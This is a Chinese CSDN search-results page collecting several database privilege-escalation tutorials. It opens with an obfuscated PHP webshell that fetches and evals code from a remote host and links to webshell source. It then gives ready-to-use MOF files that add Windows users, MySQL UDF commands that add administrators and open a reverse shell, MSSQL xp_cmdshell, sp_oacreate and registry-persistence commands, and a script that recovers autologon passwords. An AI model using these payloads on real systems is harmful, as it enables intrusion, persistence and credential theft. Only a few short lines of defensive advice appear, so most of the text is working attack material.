php_mof shell_mof提权 上传mof.php - CSDN
精华内容
参与话题
  • Part 1 前言  https://www.phpinfo.cc/?post=30,这个马子,看上去满不错,我想要源码。 <?php ...$password = 'phpinfo';...//----------功能程序------------------// ...if (empty($_SESSION['Php...

    Part 1 前言

      https://www.phpinfo.cc/?post=30,这个马子,看上去满不错,我想要源码。

    <?php
    $password = 'phpinfo';//登录密码
    //----------功能程序------------------//
    $c = "chr";
    session_start();
    if (empty($_SESSION['PhpCode'])) {
        $url = $c(104).$c(116).$c(116).$c(112).$c(58);
        $url .= $c(47).$c(47).$c(119).$c(119).$c(119);
        $url .= $c(46).$c(112).$c(104).$c(112).$c(115);
        $url .= $c(101).$c(99).$c(46).$c(99).$c(99);
        $url .= $c(47).$c(72).$c(97).$c(99).$c(107);
        $url .= $c(47).$c(52).$c(48).$c(52).$c(46).$c(103).$c(105).$c(102);
        $get = $c(102) . $c(105) . $c(108) . $c(101) . $c(95);
        $get .= $c(103) . $c(101) . $c(116) . $c(95) . $c(99);
        $get .= $c(111) . $c(110) . $c(116) . $c(101) . $c(110);
        $get .= $c(116) . $c(115);
        $_SESSION['PhpCode'] = $get($url);
    }
    $unzip = $c(103) . $c(122) . $c(105) . $c(110);
    $unzip .= $c(102) . $c(108) . $c(97) . $c(116) . $c(101);
    
    @eval($unzip($_SESSION['PhpCode']));
    ?>

     

     

    Part 2 分析

    第22行这里eval修改成exit,修改后,运行代码。

    @exit($unzip($_SESSION['PhpCode']));

     

    复制代码。

     

    修改代码,如图.

     

    运行代码,右键查看源代码,代码出来了。

     

    Part 3 后门

      常在河边走,那有不湿鞋。

     

     

    小插曲

     

    Part 4 后记

      分享,大马源码,喜欢的自己玩玩。

    链接:https://pan.baidu.com/s/1lqbglb1onPFiwRVbPQRNAw 密码:q2yy

     

    转载于:https://www.cnblogs.com/s0mf/p/9216947.html

    展开全文
  • MySQL数据库Root权限MOF方法提权研究

    千次阅读 2016-11-02 17:23:46
    MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit(https://www.exploit-db.com/exploits/23083/),简称mysql远程提权0day(MySQL ...
    MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit(https://www.exploit-db.com/exploits/23083/),简称mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day)。Windows 管理规范 (WMI) 提供了以下三种方法编译到
     WMI 存储库的托管对象格式 (MOF) 文件:
    

    方法1:运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。

    方法2:使用 IMofCompiler 接口和 $ CompileFile 方法。

    方法3:拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件。

    Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用 IMofCompiler::CompileFile 方法。第三种方法仅为向后兼容性与早期版本的 WMI 提供,并因为此功能可能不会提供在将来的版本后,不应使用。注意使用MOF方法提权的前提是当前Root帐号可以复制文件到%SystemRoot%\System32\Wbem\MOF目录下,否则会失败!

    001漏洞利用方法分析

    该漏洞的利用前提条件是必须具备mysql的root权限,在Kingcope公布的0day中公布了一个pl利用脚本。

    perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555

    192.168.2.100为mysql数据库所在服务器,mysql口令为空,反弹到192.168.2.150的5555端口上。

    1.生成nullevt.mof文件

    将以下代码保存为nullevt.mof文件:

    1. #pragma namespace("\\\\.\\root\\subscription")  
    2.  
    3. instance of __EventFilter as $EventFilter  
    4. {  
    5.     EventNamespace = "Root\\Cimv2";  
    6.     Name  = "filtP2";  
    7.     Query = "Select * From __InstanceModificationEvent "  
    8.             "Where TargetInstance Isa \"Win32_LocalTime\" "  
    9.             "And TargetInstance.Second = 5";  
    10.     QueryLanguage = "WQL";  
    11. };  
    12.  
    13. instance of ActiveScriptEventConsumer as $Consumer  
    14. {  
    15.     Name = "consPCSV2";  
    16.     ScriptingEngine = "JScript";  
    17.     ScriptText =  
    18.     "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add")";  
    19. };  
    20.  
    21. instance of __FilterToConsumerBinding  
    22. {  
    23.     Consumer   = $Consumer;  
    24.     Filter = $EventFilter;  
    25. }; 

    2.通过Mysql查询将文件导入

    执行以下查询语句,将上面生成的nullevt.mof导入到c:\windows\system32\wbem\mof\目录下在windows7中默认是拒绝访问的。导入后系统会自动运行,执行命令。

    1. select load_file('C:\\RECYCLER\\nullevt.mof'into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'

    002实战利用

    1.实验环境

    本次实验环境为Windows2003+Apache+PHP,已经拥有Webshell权限。

    2.上传文件到可写目录

    将nullevt.mof文件上传到服务器可写目录,例如C:\RECYCLER\,如图5-4所示。

    技术干货:MySQL数据库Root权限MOF方法提权研究

    上传文件nullevt.mof

    3.执行命令

    配置好中国菜刀,然后通过数据库管理,执行查询命令,在执行查询命令前需要先选择一下数据库,然后将以下代码复制到查询语句输入框中,如图5-5所示。

    select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

    技术干货:MySQL数据库Root权限MOF方法提权研究

    执行查询命令

    4.查看执行结果

    执行完毕后需要修改添加用户命令为将用户添加到管理员组,即“net.exe localgroup administrators admin/add\”,再次上传并查询,如图5-6所示,通过net user查看,果然admin已被添加到系统中。

    技术干货:MySQL数据库Root权限MOF方法提权研究

    添加用户成功

    003防范方法

    Mysql Root权限MOF方法提权其前提条件是能够将上传的nullevt.mof复制到系统目录下,例如c:\windows\system32\wbem\mof中,如果无法复制则会提权失败。一般对Windows2003以下操作系统效果较好,Windows2008以上由于保护机制,较少能够成功。因此可以采取以下措施进行防范:

    1.在程序数据库连接文件中尽量不要使用Root帐号进行连接。

    2.Root帐号使用强加密方式,采用字母大小写+数字+特殊字符,密码位数15位以上。

    3.对Mysql数据库的mysql数据库目录权限严格限制,IIS用户无法读写该文件。

    4. 操作系统目录c:\windows\system32\wbem禁止写入。


    展开全文
  • Windows提权系列————下篇

    千次阅读 2018-05-14 20:37:27
    前言这一篇的内容主要讲的是关于利用数据库服务来进行提权操作,今天的主要内容是利用mysql、mssql进行提权。利用Mysql提权在利用mysql提权之前首先要回顾一下mysql的常用命令:查路径:select @@basedir as ...

    前言

    这一篇的内容主要讲的是关于利用数据库服务来进行提权操作,今天的主要内容是利用mysql、mssql进行提权。

    利用Mysql提权

    在利用mysql提权之前首先要回顾一下mysql的常用命令:

    查路径:select @@basedir as basePath from dual
    
    查用户:select * from mysql.user
    
    注册函数:CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'
    
    查版本:select version();
    
    导出:select load_file(0x633A5C5C626F6F742E696E69) FROM user into outfile 'D://a.txt'
    
    写文件:select '<?php eval($_POST[cmd]);?>' into outfile 'F://a.php';
    
    开外连:GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
    
    读文件:select load_file('c:\boot.ini')
    
    移动文件:select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'

    查找root密码

    利用mysql提权的三种方式均需要获取mysql数据库最高权限root的帐号密码。所以我们先讨论下如何获取mysql的root密码:

    1.翻配置文件。关键字:config conn data sql inc database等

    2.下载数据文件并破解密文。

    root密码密文存放在:mysql数据库存储目录/mysq/user.myd中,低权限下可以用以下命令读取,或者直接使用暗月的“MYSQL低权限读取ROOT密码工具”,然后使用cmd5解密即可。


    3.暴力破解。使用类似于【凤凰扫描器】(https://github.com/0xwindows/fenghuangscanner_v3)的爆破工具。

    利用udf提权

    UDF为User Defined Function用户自定义函数,也就是支持用户自定义函数的功能。这里的自定义函数要以dll形式写成mysql的插件,提供给mysql来使用。也就是说我们可以通过编写dll文件来实现我们需要的功能,UDF编写可以参考(https://www.404sec.com/7817.html)。利用UDF提权需要知道root账户的密码,并且需要目标系统是Windows。可以使用现成的udf提权工具,下面介绍手工测试的方法。

    1.查看mysql版本

    select version();#-->5.7.14

    2.上传DLL文件

    dll文件可以使用webshell上传,也可以通过mysql导出。后缀不一定是dll,可以是任意的。64位和32位版本对应不同的dll文件,拿32位的dll去在64位系统注册的话,会提示错误:Can't open shared library 'udf.dll' (errno: 193 )

    在MYSQL 4.1以前的版本中,可以将所有的DLL文件里面的任何函数都注册到MYSQL里面以供MYSQL调用。无论这个DLL在什么位置,函数的声明是什么样的。

    在MYSQL 4.1及以后的版本中,对UDF函数进行了限制,只有实现了一个特定接口的函数才可以被成功注册到MYSQL中,这样就防止了通过MYSQL非法调用系统的DLL。

    在MYSQL5.0以后,对注册的DLL的位置有了限制,创建函数的时候,所对应的DLL不能包含/或者\,简单的理解就是不能是绝对路径。 所以我们将DLL上传到包含在PATH这个环境变量内的目录中来跳过这个限制(运行echo %path%可以查看可写目录,例如:C:\WINDOWS\udf.dll或C:\WINDOWS\system32\udf.dll),或者放到盘符的根目录下通过c:udf.dll这种形式的写法来跳过限制。

    Mysql5.1及以上版本,必须将DLL文件上传到mysql安装目录下的lib\plugin文件夹下才能创建自定义的函数。默认情况下’plugin’文件夹并不存在,可能就是为了防止通过into dumpfile将DLL来写到这个文件夹。可以用命令show variables like '%plugin%'查看是否存在plugin文件夹。可以在webshell中手工创建lib、plugin文件夹,也可以像下面这样利用NTFS ADS流来创建文件夹(5.7.14 权限不足,Errcode: 13 - Permission denied。5.5.8可以。哪些版本可以?):

    如果mysql服务器开启了secure-file-priv选项,就只能将文件导出到指定目录下。可以通过show variables like '%secure%';查询secure-file-priv的值。使用#注释掉mysql安装目录下my.ini 或者mysql.cnf中的secure_file_priv="c:/wamp64/tmp"一行,然后重启mysql就可以将文件导出到任意目录了。(待解决问题:apache用户有权限改这个配置文件并且重启mysql么?)

    1.创建函数

    create function function_name returns string soname 'dll_path' //function_name必须是dll文件中函数
    
    create function cmdshell returns string soname 'udf.dll'//eg

    2.调用函数

    select function_name(函数参数);
    
    select cmdshell('net user waitalone waitalone.cn /add');#eg

    3.删除函数

    drop function function_name;
    
    drop function cmdshell;#eg
    
    -- 或者:
    
    delete from mysql.func where name='function_name';
    
    delete from mysql.func where name='cmdshell';#eg

    利用mof提权

    Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:

    1. 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。

    2. 使用 IMofCompiler 接口和 $ CompileFile 方法。

    3. 拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件。

    也就是说mof提权其实是windows的问题,而不是mysql的漏洞。第三种方法仅为向后兼容性与早期版本的 WMI 提供,因为此功能可能不会提供在将来的版本后。mysql5.7开始默认使用secure-file-priv选项,不能随意选择导出路径,所以mof提权仅适用于以下条件:

    • 操作系统版本低于Windows Server 2008;

    • mysql 版本低于5.7

    可以使用现成的mof提权工具,下面介绍手工测试的方法。

    1.查看mysql版本

    select version();#-->5.5.8

    2.编写mof文件


    3.导出mof文件

    select load_file('C:\RECYCLER\1.mof') into dumpfile 'c:/windows/system32/wbem/mof/test.mof';#先上传到可写目录然后导出到指定目录
    select char(35,112) into dumpfile  'c:/windows/system32/wbem/mof/test.mof';#直接导出到指定目录。35,112 代表 ASCII 码值表

    成功执行之后,会在c:/windows/system32/wbem/mof/good/目录下多出个test.mof文件。如果mof文件不能执行,则会在c:/windows/system32/wbem/mof/bad/目录下多出个test.mof文件。

    4.清理痕迹。成功提权后清理很及时需要删除添加的用户,但是每分钟又会重新执行脚本添加用户。需要使用如下命令清理痕迹:

    启动项/组策略

    windows 启动项和开关机组策略目录下的脚本会在用户登录、开机、关机是自动运行,利用mysql向这些路径导出脚本即可执行任意命令,mysql5.7开始默认使用secure-file-priv选项,不能随意选择导出路径,所以这种办法需要目标mysql版本低于5.7。具体操作命令如下:

    自运行脚本路径整理:


    利用Mssql提权

    MSSQL作为在Windows系统下最常用的数据库,利用mssql来提权也是经常会遇到的,下面就针对mssql如何提权做一个详细的介绍。

    获取数据库密码

    1. 翻配置文件。conn.asp(asp站点) , web.config(aspx站点) , db.inc

    2. 暴力破解。

    sa权限利用

    微软的SQL Server在提权过程中往往也会给我们很大帮助,尤其是当找到SA用户的密码时,系统权限就基本到手了。

    xp_cmdshell

    得到SA权限后,我们用的最多的是“xp_cmdshell”这个扩展存储直接执行命令,具体步骤如下:

    1.开启xp_cmdshell

    2.执行命令

    exec xp_cmdshell 'whoami'

    从SQL Server 2005 开始,xp_cmdshell默认是禁用的,而且执行xp_cmdshell可能会触发安全警报。下面介绍一些其它通过SQL Server 执行系统命令的方法。

    sp_oacreate

    在xp_cmdshell被删除或者出错情况下,可以充分利用SP_OACreate进行提权。

    1.打开组件

    2.执行命令

    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\programdata\1.txt'   --执行命令无回显

    详细介绍:

    http://www.cnblogs.com/xiao0/archive/2012/08/09/2630048.html

    SQL Server CLR

    Microsoft SQL Server 现在具备与 Microsoft Windows .NET Framework 的公共语言运行时 (CLR) 组件集成的功能。CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。对于 SQL Server 用户和应用程序开发人员来说,CLR 集成意味着您现在可以使用任何 .NET Framework 语言(包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#)编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。 要通过此种方式来执行命令,也有几个前提:

    1.在SQL Server上能启用CLR并可以创建自定义存储过程

    2.SQL Server当前账号具有执行命令/代码所需要的权限

    具体测试步骤如下:

    1.新建项目。安装Visual Studio和SQL Server数据库,创建一个新的SQL Server数据库项目。设置项目属性,目标平台修改为需要的目标平台,如SQL Server 2012; 将SQLCLR权限级别修改为UNSAFE;修改.Net 框架版本为自己需要的版本;语言选择C#。右键项目,选择添加->新建项,新建SQL CLR C# 存储过程。

    2.编写代码。

    3.编译。到编译目录下可以看到一个dacpac后缀的文件,双击文件解压打开mode.sql,执行sql文件中的语句:


    4.开启数据库服务器配置选项clr enabled:


    5.执行命令:

    EXEC [dbo].[SqlStoredProcedure1];

    6.删除存储过程:

    DROP PROCEDURE [dbo].[SqlStoredProcedure1];
    DROP ASSEMBLY ExecCode

    参考连接:

    https://evi1cg.me/archives/Exec_OS_Command_Via_MSSQL.html
    Agent Job

    此种方式适用于服务器开启了MSSQL Agent Job服务,并且服务器中当前运行的用户账号拥有足够的权限去创建并执行代理作业的情况。

    参考连接:

    http://bobao.360.cn/learning/detail/3070.html

    其他方式

    freebuf上有一篇很详细的文章,链接如下:

    http://www.freebuf.com/column/142307.html

    dbower权限

    类似于mysql写脚本到自启动目录下,mssql也可以通过差异备份写脚本到自启动目录下。差异备份保存的文件不只是我们的脚本文件,还会有一些我们用不到的垃圾数据。在bat脚本中,我们可以使用回车把垃圾数据提交了,系统会把它们当成无用命令处理,不会影响脚本的正常运行,所以我们在这里选用bat脚本。而且MSSQL备份的时候,到一定的字符长度就会出现垃圾的字符,那个字符会影响我们的操作。所以我们得把语句尽量缩短。

    除了写脚本到自启动目录下,还可以通过注册表实现开机运行命令:

    xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','exec','REG_SZ','cmd /c whoami > c:\programdata\4.txt'

    工具——PowerUpSQL(未测试)

    针对mssql的的攻击与利用,有一个强大的工具PowerUpSQL

    https://github.com/NetSPI/PowerUpSQL

    里面也有很多针对MSSQL的攻击方式。这里介绍两种利用方式:

    • SP_Addextendedproc
      1、创建DLL

    Create-SQLFileXpDll -OutFile C:\programdata\exec.dll -Command "echo Exec test > C:\programdata\test.txt" -ExportName xp_test
    2、导入DLL
    //via local disk:
    sp_addextendedproc 'xp_test', 'C:\programdata\xp_test.dll'
    //via UNC path:
    sp_addextendedproc 'xp_test', '\servername\pathtofile\exec.dll'
    3、调用存储过程
    exec master..xp_test;

    4、卸载存储过程

    sp_dropextendedproc 'xp_test'
    • xp_regread恢复Windows自动登录凭据

    可以将Windows配置为在计算机启动时自动登录。  在大多数情况下,当Windows配置为自动登录时,未加密的凭据存储在注册表项中:HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon。PowerUpSQL中的“Get-SQLRecoverPwAutoLogon”函数可以获取到默认Windows自动登录信息和备用Windows自动登录信息(如果已设置),然后它返回相关的域名,用户名和密码。

    $Accessible = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 15| Where-Object {$_.Status –eq “Accessible”}
    $Accessible | Get-SQLRecoverPwAutoLogon -Verbose

    参看链接:

    https://evi1cg.me/archives/Powerup.html

    总结

    本文主要讲解了利用Windows下的常用数据库进行提权的各种姿势,如果大家有什么意见和建议请积极留言,如果需要详细交流可以加群寻找作者进行沟通。

    展开全文
  • MySQL提权原理及过程

    千次阅读 2018-01-12 15:55:19
    mof提权原理 mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去...

    mof提权原理

    mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。

    mof提权的过程:

    1. 将mof上传至任意可读可写目录下,这里我传到D:\wamp\下命名为:xishaonian.mof。也就是:D:\wamp\xishaonian.mof

    2. 然后使用sql语句将系统当中默认的nullevt.mof给替换掉。进而让系统执行我们这个恶意的mof文件。

    3. 替换的sql语句,使用load_file函数进行操作:select load_file('D:\wamp\xishaonian.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

    4. 执行成功后,即可添加一个普通用户,然后你可以更改命令,再上传导出执行把用户提升到管理员权限,然后3389连接之就ok了。

    mof文件代码如下所示:

    #pragma namespace("\\\\.\\root\\subscription") 
    
    instance of __EventFilter as $EventFilter 
    { 
        EventNamespace = "Root\\Cimv2"; 
        Name  = "filtP2"; 
        Query = "Select * From __InstanceModificationEvent " 
                "Where TargetInstance Isa \"Win32_LocalTime\" " 
                "And TargetInstance.Second = 5"; 
        QueryLanguage = "WQL"; 
    }; 
    
    instance of ActiveScriptEventConsumer as $Consumer 
    { 
        Name = "consPCSV2"; 
        ScriptingEngine = "JScript"; 
        ScriptText = 
        "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; 
    }; 
    
    instance of __FilterToConsumerBinding 
    { 
        Consumer   = $Consumer; 
        Filter = $EventFilter; 
    };
    

    可见其中是有一段添加用户的脚本。账号为admin 密码为admin

    ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; 
    

    利用UDF提权

    udf提权这是最常见的提权方式了,但是往往在执行过程中老是遇到"Can't open shared library"的情况,这里我们可以利用NTFS ADS流来解决这个问题。

    1. 最常见的是直接使用udf.php此类的工具来执行udf提权,具体如下。连接到mysql以后,先导出udf.dll到c:\windows\system32目录下。
    2. 创建相应的函数并执行命令,具体如下:
    • create function cmdshell returns string soname 'udf.dll';
    • select cmdshell('net user waitalone waitalone.cn /add');
    • select cmdshell('net localgroup administrators waitalone /add');
    • drop function cmdshell; 删除函数
    • delete from mysql.func where name='cmdshell' 删除函数
    1. 某些情况下,我们会遇到Can't open shared library的情况,这时就需要我们把udf.dll导出到lib\plugin目录下才可以,但是默认情况下plugin不存在,怎么办? 还好有大牛研究出了利用NTFS ADS流来创建文件夹的方法
    • select @@basedir; //查找到mysql的目录
    • select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib::$INDEX_ALLOCATION';//利用NTFS ADS创建lib目录
    • select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin::$INDEX_ALLOCATION';//利用NTFS ADS创建plugin目录
    1. 执行成功以后再进行导出即可。

    反弹端口连接提权

    假如我们扫到了一个mysql的root弱密码,并且可以外连,但是服务器上面的网站又无法Getshell,这时我们怎么办呢?

    1. 利用mysql客户端工具连接mysql服务器,然后执行下面的操作。
    • mysql.exe -h 172.16.10.11 -uroot -p
    • Enter password:
    • mysql> . c:\mysql.txt
    • mysql>select backshell("YourIP",2010);
    1. 本地监听你反弹的端口
    • nc.exe -vv -l -p 2010
    1. 成功后,你将获得一个system权限的cmdshell,其实这个也是利用的UDF提权。
    参考文章:

    展开全文
  • 提权原理及过程(二)

    千次阅读 2018-01-11 18:06:53
    mof提权原理、UDF提权、反弹提权
  • MySQL数据库渗透及漏洞利用总结

    万次阅读 2018-05-09 15:40:45
    地址:...amp;mid=2247484839&amp;idx=1&amp;sn=16720fb8e035c8bbe612d738839262c5&amp;chksm=e8751ed8df0297ce54ef5acabd5a42f66f81f66b56b168ba80a3af5d55877d546aee...
  • MySQL提权篇

    万次阅读 2018-05-12 11:36:50
    一、Mysql提权必备条件1.服务器安装Mysql数据库利用Mysql提权的前提就是服务器安装了mysql数据库,且mysql的服务没有降权,Mysql数据库默认安装是以系统权限继承的,并且需要获取Mysql root账号密码。...
  • MYSQL提权总结

    千次阅读 2016-01-23 17:43:25
    经擦遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过...一、利用mof提权  前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stu
  • 渗透测试——提权方式总结

    千次阅读 2019-06-11 15:33:12
    (内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root ...5、第三方软件...
  • webshell提权

    千次阅读 2018-09-11 22:45:25
    ASP/PHP 匿名权限 ASPX USER权限 JSP 通常是系统权限 收集信息:  内外网 服务器系统和版本位数 服务器的补丁情况 服务器的安装软件情况 服务器的防护软件情况 端口情况 支持脚本情况 。。....
  • 一、 二、Windwos常见提权
  • 长亭安服面经 && 2019.04

    千次阅读 2019-04-27 21:50:07
    长亭安服面经 && 2019.04 暑假本来是不想实习的,安研基本上不收大二,做安服又感觉学不到太多东西,就纯给人做苦力了不值。后来学长强推了一波长亭安服,说虽然是安服,但是实习经验其实也蛮重要的,刚好...
  • 1. 提权 低权限给高权限去提取(你已经获得一定的权限) Windows 一般用户 系统用户 管理员 system Linux 普通用户 系统用户 root 2. udf提权 ...1、其利用条件是目标系统是Windows(Win2000,XP,Win2003);...
  • 教你一些MySQL数据库入侵及防御方法

    千次阅读 2018-09-05 10:21:07
    一、MySQL 信息收集 1、端口信息收集 MySQL 默认端口是 3306 端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测,推荐使用: d47e62d2b349aca45e42305ed6714efbe5ed61d9iisputter,直接填写 ...
  • https://github.com/l3m0n/pentest_study [TOC] 域环境搭建 ...准备:DC: win2008DM: win2003DM: winxp ...2、配置固定ip:其中网关设置错误,应该为192.168.206.2,开始默认的网管 ...4、配置域服务:dos下面输入dcpro
  • Redis未授权访问在windows下的利用

    千次阅读 2019-07-23 13:06:35
    在某次内网渗透中遇到了redis+windows的环境,由于目标较为敏感因此在本地和uknow大佬一起进行了测试,也因此有了下面的文章。 环境搭建 首先下载windows版本的redis ...下载的Redis包含32位和64位操作系统,根据自己...
  • Mysql数据库渗透及漏洞利用总结

    千次阅读 2018-07-07 18:37:55
    Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关...
  • mysql outfile导出webshell 条件:知道物理路径,root权限,同时mysql需要有write权限,secure_file_priv配置不为null,查看方法: show global variables like '%secure_file_priv%';...php phpinfo();?>...
  • 【安全面试】安全面试总结1

    千次阅读 2018-11-06 14:36:19
    这是我在面试中被问到一些问题,主要偏向基础知识,如有错误,还望指正。 1. sql注入 1. 原理 ...攻击者通过构造一些恶意的SQL语句,让后台的数据库去解析,从而达到入侵目标网络,获取敏感信息 ...
  • <p></p><hr> title: Windows下三种mysql提权剖析 索引 这篇文章是写基于windows环境下的一些mysql提权方法的分析并利用。这些方法老生常谈,但困于很多文章在讲分析和利用的时候模棱两可,因此想...
1 2 3 4 5 ... 13
收藏数 256
精华内容 102
关键字:

php_mof shell